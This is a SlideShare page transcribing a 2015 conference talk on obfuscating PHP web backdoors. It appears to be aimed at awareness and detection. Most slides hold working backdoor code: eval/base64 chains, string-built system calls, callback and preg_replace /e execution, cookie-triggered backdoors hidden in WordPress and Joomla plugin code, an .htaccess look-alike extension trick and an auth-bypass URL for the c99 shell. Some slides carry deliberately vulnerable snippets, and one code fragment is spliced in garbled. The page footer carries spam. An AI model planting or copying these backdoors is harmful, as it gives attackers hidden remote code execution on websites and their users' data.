SlideShare a Scribd company logo

Php web backdoor obfuscation

Sandro Zaccarini
Sandro Zaccarini

This document summarizes Sandro "guly" Zaccarini's presentation on PHP web backdoor obfuscation techniques at EndSummerCamp 2k15. The presentation covers placing backdoors in PHP websites, different methods for executing code through PHP, real world examples of obfuscated backdoors found in the wild, and vulnerabilities that can enable backdoor execution. The goal is to demonstrate how PHP backdoors can be hidden through obfuscation and exploit vulnerabilities.

Software
1 of 56
Download to read offline
PHP web backdoor obfuscation Sandro “guly” Zaccarini EndSummerCamp 2k15
PHP web backdoor obfuscation - guly@ESC 2k15 whoami • Sandro “guly” Zaccarini • Security Artist • guly@guly.org • @theguly
PHP web backdoor obfuscation - guly@ESC 2k15 agenda • intro • backdoor placement • howto execute code • real world examples • vulnerabilities • hack a backdoor
PHP web backdoor obfuscation - guly@ESC 2k15 PHP superglobals • $_GET • $_POST • $_COOKIE • $_REQUEST • $_SERVER
PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php?foo=1&bar=2 POST /superglobal.php?foo=1&bar=2 HTTP/1.0 Content-length: 391 Cookie: bar=4; foo=3 example of a POST request used to explain superglobals
PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php?foo=1&bar=2 var_dump($_GET) array(2) { ["foo"]=> string(1) "1" ["bar"]=> string(1) "2" } var_dump($_POST) array(1) { ["foo"]=> string(1) "3" } var_dump($_COOKIE) array(1) { ["bar"]=> string(1) "4" }
PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php?foo=1&bar=2 var_dump($_GET) array(2) { ["foo"]=> string(1) "1" ["bar"]=> string(1) "2" } var_dump($_POST) array(1) { ["foo"]=> string(1) "3" } var_dump($_COOKIE) array(1) { ["bar"]=> string(1) "4" } var_dump($_REQUEST); in red we can see what $_REQUEST has
PHP web backdoor obfuscation - guly@ESC 2k15 "GET /superglobal.php?foo=1&bar=2 HTTP/1.1" 200 391 "POST /superglobal.php?foo=1&bar=2 HTTP/1.1" 200 391 /superglobal.php?foo=1&bar=2
PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php var_dump($_SERVER) headers: foo=3 array(x) { ["HTTP_HOST"]=> string(13) "172.16.34.141" ["HTTP_CONNECTION"]=> string(10) "keep-alive" ["CONTENT_LENGTH"]=> string(1) "5" ["HTTP_FOO"]=> string(1) "3" ...
PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php "GET /superglobal.php? foo=1&bar=2 HTTP/1.1" 200 391 "POST /superglobal.php HTTP/1.1" 200 760 again no traces about headers nor cookies
PHP web backdoor obfuscation - guly@ESC 2k15 backdoor placement • requirements: • folder owned by www-data • file owned by www-data • folder/file chmod 777
PHP web backdoor obfuscation - guly@ESC 2k15 backdoor placement • requirements: • folder owned by www-data • file owned by www-data • folder/file chmod 777
PHP web backdoor obfuscation - guly@ESC 2k15 backdoor placement • configuration.php • themes/$theme/$file • upload/$file pathes almost everywhere writable by www-data user
PHP web backdoor obfuscation - guly@ESC 2k15 howto execute code (HEC) • exec • shell_exec • passthru • popen • pcntl • create_function • ...
PHP web backdoor obfuscation - guly@ESC 2k15 eval - HEC eval($x); eval(base64_decode($x)); eval(gzinflate(base64_decode($x))); $y='base'.(32*2).'_de'.'code'; eval($y($z)); $x = "phpinfo();" where $x = $_GET['x']
PHP web backdoor obfuscation - guly@ESC 2k15 subs - HEC $x=str_replace('x', 's', 'xyxtem');$x($_GET[x]); $x='syste'.chr(109);$x($_GET[x]); $x=strrev("cexe_llehs");echo $x($_GET[x]); ?x=ls red block means URI used, like http:// foo.com/page.php?x=ls
PHP web backdoor obfuscation - guly@ESC 2k15 straight - HEC assert($_GET[x]); $_GET[y]($_GET[x]); ?x=phpinfo() ?y=system&x=ls
PHP web backdoor obfuscation - guly@ESC 2k15 callback - HEC call_user_func_array($_GET[y], array($_GET[x])); filter_var($_REQUEST[x], FILTER_CALLBACK, array('options' => 'assert')); ?x=phpinfo() ?y=system&x=ls
PHP web backdoor obfuscation - guly@ESC 2k15 /e - HEC $a = array($_GET[x] => '|.*|e',); array_walk($arr, $_REQUEST[y], ''); preg_replace("/.*/e",$_GET[x], ""); mb_ereg_replace
 ('.*', $_REQUEST[x], '', 'e'); ?x=ls&y=preg_replace ?x=ls
PHP web backdoor obfuscation - guly@ESC 2k15 register function - HEC ?y=assert&x=phpinfo() $e = $_REQUEST[y]; register_tick_function($e, $_GET[x]); register_shutdown_function($e, $_GET[x]);
PHP web backdoor obfuscation - guly@ESC 2k15 sqlite - HEC ?y=assert&x=phpinfo() $e = $_REQUEST[y]; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('z', $e, 1); $sth = $db->prepare("SELECT z(:exec)"); $sth->execute(array(':exec' => $_REQUEST[x]));
PHP web backdoor obfuscation - guly@ESC 2k15 memcache - HEC ?x=phpinfo() $mem = new Memcache(); $re = @$mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);')); $mem->connect($_REQUEST[x], 11211, 0);
PHP web backdoor obfuscation - guly@ESC 2k15 yaml - HEC ?x=ls $str = urlencode($_REQUEST[x]); $yaml = <<<EOD greeting: !{$str} "|.+|e" EOD; $parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST[x]}" => 'preg_replace'));
PHP web backdoor obfuscation - guly@ESC 2k15 real world examples
PHP web backdoor obfuscation - guly@ESC 2k15 real world examples <?php $exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgknd YSk9PSdtandCcgJndiYgJGMondJGEpPjM"; $iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJ yksIGFyndcmF5KCcnLCcrJyk"; $ts = str_replace("b","","bsbtr_brbepblabcbe"); $fy="sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkp KTtlYnd2hvICc8LycuJGsnduJz4nO30="; $sjb="peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2Y WwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc"; $dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere"); $mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn"); $tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha(); ?> no reversing allowedno reversing allowed
PHP web backdoor obfuscation - guly@ESC 2k15 real world: array_diff_ukey array_diff_ukey(
 array(
 (string)$_GET['password']=>1),
 array(
 (string) $_GET['repassword'])=>2),
 $_REQUEST['login']) ?password=ls&repassword=
 &login=system doesn't look like a login page code?
PHP web backdoor obfuscation - guly@ESC 2k15 real world: array_diff_ukey "GET /array_ukey_diff/array_ukey_diff.php? password=ls&repassword=&login=system HTTP/1.1" 200 253 ?password=ls&repassword=
 &login=system
PHP web backdoor obfuscation - guly@ESC 2k15 real world: $_SERVER ($a=@$_SERVER['HTTP_REMOTE_ADR'])
 .@$a($_SERVER['HTTP_SERVER_ADR']); HEADER VALUE REMOTE_ADR system SERVER_ADR ls ($a=@system).$a(ls) got the typo?
PHP web backdoor obfuscation - guly@ESC 2k15 real world: $_SERVER "GET /a/a.php HTTP/1.1" 200 239" HEADER VALUE REMOTE _ADR system SERVER_ ADR ls
PHP web backdoor obfuscation - guly@ESC 2k15 real world: extract @extract ($_REQUEST); @die ($x($y)); ?x=shell_exec&y=ls
PHP web backdoor obfuscation - guly@ESC 2k15 real world: extract "GET /extract/extract.php? x=shell_exec&y=ls HTTP/1.1" 200 244" ?x=shell_exec&y=ls
PHP web backdoor obfuscation - guly@ESC 2k15 real world: LICESNE.php preg_match_all('/.*/', php_strip_whitespace(__FILE__), $matches); eval(base64_decode($matches[0] [2])); /* BEGIN LICENSE CODE */ cGhwaW5mbygp again, got the typo?
PHP web backdoor obfuscation - guly@ESC 2k15 real world: LICESNE.php
PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess $ pwd /var/www/uploads $ cat .htaccess AddType application/x-httpd-php .png <Files "c.png"> SetHandler application/x-httpd-php </Files>
PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess
PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess same url leads to different results?! wait, at the left there's phpinfo() !
PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess AddType application/x-httpd-php
 .рng
PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess "GET /htaccess/a.%D1%80ng HTTP/1.1" 200 18105" "GET /htaccess/a.png HTTP/1.1" 200 184249" my workstation doesn't handle unicode, log analysis system should
PHP web backdoor obfuscation - guly@ESC 2k15 real world: exif_data
PHP web backdoor obfuscation - guly@ESC 2k15 PHP's exif_read_data function PHP has a function called exif_read_data which allows it to read the header data of image files.  It is used extensivly in many different plugins and tools.
PHP web backdoor obfuscation - guly@ESC 2k15 "Make"]=> string(5) "/.*/e" ["Model"]=> string(108) "eval(base64_decode('aWYgKG..'));" real world: exif_data $exif = exif_read_data('http:// foo.bar/image.jpg); preg_replace($exif['Make'], $exif['Model'],'Canon');
PHP web backdoor obfuscation - guly@ESC 2k15 real world: wp plugin <?php function start_cforms_session(){ @session_cache_limiter('private, must- revalidate'); @session_cache_expire(0); $form1=@$_COOKIE['Kcqf3']; if ($form1) { $opt=$form1(@$_COOKIE['Kcqf2']); $au=$form1(@$_COOKIE['Kcqf1']); $opt=("/292/e",$au,292); die(); } }
PHP web backdoor obfuscation - guly@ESC 2k15 real world: joomla plugin public function __construct() { $filter = JRequest::getString('p3', Null, 'cookie'); if ($filter) { $option = $filter(JRequest::getString('p2', Null, 'cookie')); $auth = $filter(JRequest::getString('p1', Null, 'cookie')); $option("/123/e",$auth,123); die(); } }
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: isadmin//Authentication $user = safeEscape($_POST['user']); $pass = safeCrypt(safeEscape($_POST['pass'])); $query = "SELECT isadmin FROM user where user= $user and pass=$pass"; $isadmin = mysql_query($query); @extract($_REQUEST['login']); if ($isadmin) { admin(); } else { user(); } pseudo function, let's pretend safeEscape and safeCrypt are really safe
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: isadmin http://foo.bar/login.php? login[isadmin]=1
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: sqli prevention $check = intval($_GET[‘id']); if ($check == $_GET['id']) { $query = "SELECT name FROM table where id=$_GET[‘id']"; $result = mysql_query($query); var_dump($result); } ...gone wrong :)
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: name $query = "SELECT name FROM user where user=$user and pass=$pass"; $name = mysql_query($query); $safeName = @preg_replace("/W*/e",$name,''); echo "Welcome, <pre>$safe_name"</pre>";
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: name name => system($_GET[c]); http://foo.bar/ welcome.php?c=whoami update sql db setting my name to 'system($_GET[c]);'
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: conf.php <?php $smtp_host = '127.0.0.1'; $smtp_user = ''; $smtp_pass = ''; $smtp_from = 'root@localhost'; //sender $smtp_method = 'system'; //system or smtp $smtp_crypt = 'NONE'; //NONE SSL STARTTLS ... pretend a CMS uses a conf like this, we add a "cuscom" $smtp_method
PHP web backdoor obfuscation - guly@ESC 2k15 vulns: conf.php <?php global $smtp_host,$smtp_user,$smtp_pass; global $smtp_from,$smtp_method,$smtp_crypt; require 'conf.php'; doCron(); $smtp_method($_GET['mailto']); http://foo.bar/cron.php? mailto=ls
PHP web backdoor obfuscation - guly@ESC 2k15 more vulns • imagecreatefromjpeg • gd • unserialize • php object injection will you attend to V2.0 talk? :)
PHP web backdoor obfuscation - guly@ESC 2k15 hack backdoor: c99//Authentication $login = "1"; //login [cut] @extract($_REQUEST["c99shcook"]); [cut] if ($login) {  if(empty($md5_pass)) {$md5_pass = md5($pass);}  if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {   if ($<?php $check = intval($_GET['id']); if ($check == $_GET['id']) { $query = "SELECT name FROM table where id=$_GET['id']"; $result = mysql_query($query); var_dump($result); } ?> === false) {$login_txt = "";}   elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}   header("WWW-Authenticate: Basic realm="c99shell ".$shver.": ".$login_txt.""");   header("HTTP/1.0 401 Unauthorized");   exit($accessdeniedmess);  } } // go on
PHP web backdoor obfuscation - guly@ESC 2k15 hack backdoor: c99 https://127.0.0.1/c99.php? c99shcook[login]=0
PHP web backdoor obfuscation - guly@ESC 2k15 hack backdoor: c99
PHP web backdoor obfuscation - guly@ESC 2k15 credits • ESC • Sucuri • lazy webmaster/developer
PHP web backdoor obfuscation - guly@ESC 2k15 question? acta est fabula, plaudite!

Recommended

PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vuln
Sandro Zaccarini
 
Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in Omeka
Arden Kirkland
 
Testing TYPO3 Applications
Testing TYPO3 ApplicationsTesting TYPO3 Applications
Testing TYPO3 Applications
André Wuttig
 
Php101
Php101Php101
Php101
Ömer Taşkın
 
Semantic Web & TYPO3
Semantic Web & TYPO3Semantic Web & TYPO3
Semantic Web & TYPO3
André Wuttig
 
Perl6 in-production
Perl6 in-productionPerl6 in-production
Perl6 in-production
Andrew Shitov
 
Wsomdp
WsomdpWsomdp
Wsomdp
riahialae
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
DoktorMandrake
 

Recommended

PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vuln
Sandro Zaccarini
 
Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in Omeka
Arden Kirkland
 
Testing TYPO3 Applications
Testing TYPO3 ApplicationsTesting TYPO3 Applications
Testing TYPO3 Applications
André Wuttig
 
Php101
Php101Php101
Php101
Ömer Taşkın
 
Semantic Web & TYPO3
Semantic Web & TYPO3Semantic Web & TYPO3
Semantic Web & TYPO3
André Wuttig
 
Perl6 in-production
Perl6 in-productionPerl6 in-production
Perl6 in-production
Andrew Shitov
 
Wsomdp
WsomdpWsomdp
Wsomdp
riahialae
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
DoktorMandrake
 
The Joy of Smartmatch
The Joy of SmartmatchThe Joy of Smartmatch
The Joy of Smartmatch
Andrew Shitov
 
Perl6 grammars
Perl6 grammarsPerl6 grammars
Perl6 grammars
Andrew Shitov
 
Perl 6 by example
Perl 6 by examplePerl 6 by example
Perl 6 by example
Andrew Shitov
 
Top 10 php classic traps php serbia
Top 10 php classic traps php serbiaTop 10 php classic traps php serbia
Top 10 php classic traps php serbia
Damien Seguy
 
Php Security
Php SecurityPhp Security
Php Security
guest7cf35c
 
How to stand on the shoulders of giants
How to stand on the shoulders of giantsHow to stand on the shoulders of giants
How to stand on the shoulders of giants
Ian Barber
 
C99[2]
C99[2]C99[2]
C99[2]
guest8914af
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & more
Mattias Geniar
 
I, For One, Welcome Our New Perl6 Overlords
I, For One, Welcome Our New Perl6 OverlordsI, For One, Welcome Our New Perl6 Overlords
I, For One, Welcome Our New Perl6 Overlords
heumann
 
PHP7 - Scalar Type Hints & Return Types
PHP7 - Scalar Type Hints & Return TypesPHP7 - Scalar Type Hints & Return Types
PHP7 - Scalar Type Hints & Return Types
Eric Poe
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
Andrea Cardinale
 
Php with my sql
Php with my sqlPhp with my sql
Php with my sql
husnara mohammad
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
Ian Barber
 
Php 7 hhvm and co
Php 7 hhvm and coPhp 7 hhvm and co
Php 7 hhvm and co
Pierre Joye
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find Fraudsters
Ian Barber
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniques
Wim Godden
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
Ian Barber
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners
musrath mohammad
 
Using Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkUsing Geeklog as a Web Application Framework
Using Geeklog as a Web Application Framework
Dirk Haun
 
Barely Legal Xxx Perl Presentation
Barely Legal Xxx Perl PresentationBarely Legal Xxx Perl Presentation
Barely Legal Xxx Perl Presentation
Attila Balazs
 
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
modeelf
 
The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016
The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016
The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016
Codemotion
 

More Related Content

What's hot

The Joy of Smartmatch
The Joy of SmartmatchThe Joy of Smartmatch
The Joy of Smartmatch
Andrew Shitov
 
Barely Legal Xxx Perl Presentation
Barely Legal Xxx Perl PresentationBarely Legal Xxx Perl Presentation
Barely Legal Xxx Perl Presentation
Attila Balazs
 

What's hot (20)

The Joy of Smartmatch
The Joy of SmartmatchThe Joy of Smartmatch
The Joy of Smartmatch
 
Perl6 grammars
Perl6 grammarsPerl6 grammars
Perl6 grammars
 
Perl 6 by example
Perl 6 by examplePerl 6 by example
Perl 6 by example
 
Top 10 php classic traps php serbia
Top 10 php classic traps php serbiaTop 10 php classic traps php serbia
Top 10 php classic traps php serbia
 
Php Security
Php SecurityPhp Security
Php Security
 
How to stand on the shoulders of giants
How to stand on the shoulders of giantsHow to stand on the shoulders of giants
How to stand on the shoulders of giants
 
C99[2]
C99[2]C99[2]
C99[2]
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & more
 
I, For One, Welcome Our New Perl6 Overlords
I, For One, Welcome Our New Perl6 OverlordsI, For One, Welcome Our New Perl6 Overlords
I, For One, Welcome Our New Perl6 Overlords
 
PHP7 - Scalar Type Hints & Return Types
PHP7 - Scalar Type Hints & Return TypesPHP7 - Scalar Type Hints & Return Types
PHP7 - Scalar Type Hints & Return Types
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
 
Php with my sql
Php with my sqlPhp with my sql
Php with my sql
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
Php 7 hhvm and co
Php 7 hhvm and coPhp 7 hhvm and co
Php 7 hhvm and co
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find Fraudsters
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniques
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners
 
Using Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkUsing Geeklog as a Web Application Framework
Using Geeklog as a Web Application Framework
 
Barely Legal Xxx Perl Presentation
Barely Legal Xxx Perl PresentationBarely Legal Xxx Perl Presentation
Barely Legal Xxx Perl Presentation
 

Similar to Php web backdoor obfuscation

Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)
Nordic APIs
 
Becoming a better WordPress Developer
Becoming a better WordPress DeveloperBecoming a better WordPress Developer
Becoming a better WordPress Developer
Joey Kudish
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
Orange Tsai
 
Orange@php conf
Orange@php confOrange@php conf
Orange@php conf
Hash Lin
 
The symfony platform: Create your very own framework (PHP Quebec 2008)
The symfony platform: Create your very own framework (PHP Quebec 2008)The symfony platform: Create your very own framework (PHP Quebec 2008)
The symfony platform: Create your very own framework (PHP Quebec 2008)
Fabien Potencier
 

Similar to Php web backdoor obfuscation (20)

fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
fb-researchの舞台裏No.2~技術編~(HatchUp主催 渋谷Facebookアプリ勉強会)
 
The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016
The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016
The new features of PHP 7 - Enrico Zimuel - Codemotion Milan 2016
 
The new features of PHP 7
The new features of PHP 7The new features of PHP 7
The new features of PHP 7
 
Web Scraping with PHP
Web Scraping with PHPWeb Scraping with PHP
Web Scraping with PHP
 
Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
Introduction to CodeIgniter (RefreshAugusta, 20 May 2009)
Introduction to CodeIgniter (RefreshAugusta, 20 May 2009)Introduction to CodeIgniter (RefreshAugusta, 20 May 2009)
Introduction to CodeIgniter (RefreshAugusta, 20 May 2009)
 
How to build a High Performance PSGI/Plack Server
How to build a High Performance PSGI/Plack Server How to build a High Performance PSGI/Plack Server
How to build a High Performance PSGI/Plack Server
 
What's new with PHP7
What's new with PHP7What's new with PHP7
What's new with PHP7
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy Code
 
Blog Hacks 2011
Blog Hacks 2011Blog Hacks 2011
Blog Hacks 2011
 
Api Design
Api DesignApi Design
Api Design
 
Mojolicious. Веб в коробке!
Mojolicious. Веб в коробке!Mojolicious. Веб в коробке!
Mojolicious. Веб в коробке!
 
Web scraping 101 with goutte
Web scraping 101 with goutteWeb scraping 101 with goutte
Web scraping 101 with goutte
 
Teaching Your WAF New Tricks
Teaching Your WAF New TricksTeaching Your WAF New Tricks
Teaching Your WAF New Tricks
 
Becoming a better WordPress Developer
Becoming a better WordPress DeveloperBecoming a better WordPress Developer
Becoming a better WordPress Developer
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 
Orange@php conf
Orange@php confOrange@php conf
Orange@php conf
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
The symfony platform: Create your very own framework (PHP Quebec 2008)
The symfony platform: Create your very own framework (PHP Quebec 2008)The symfony platform: Create your very own framework (PHP Quebec 2008)
The symfony platform: Create your very own framework (PHP Quebec 2008)
 

Recently uploaded

%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 

Recently uploaded (20)

%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
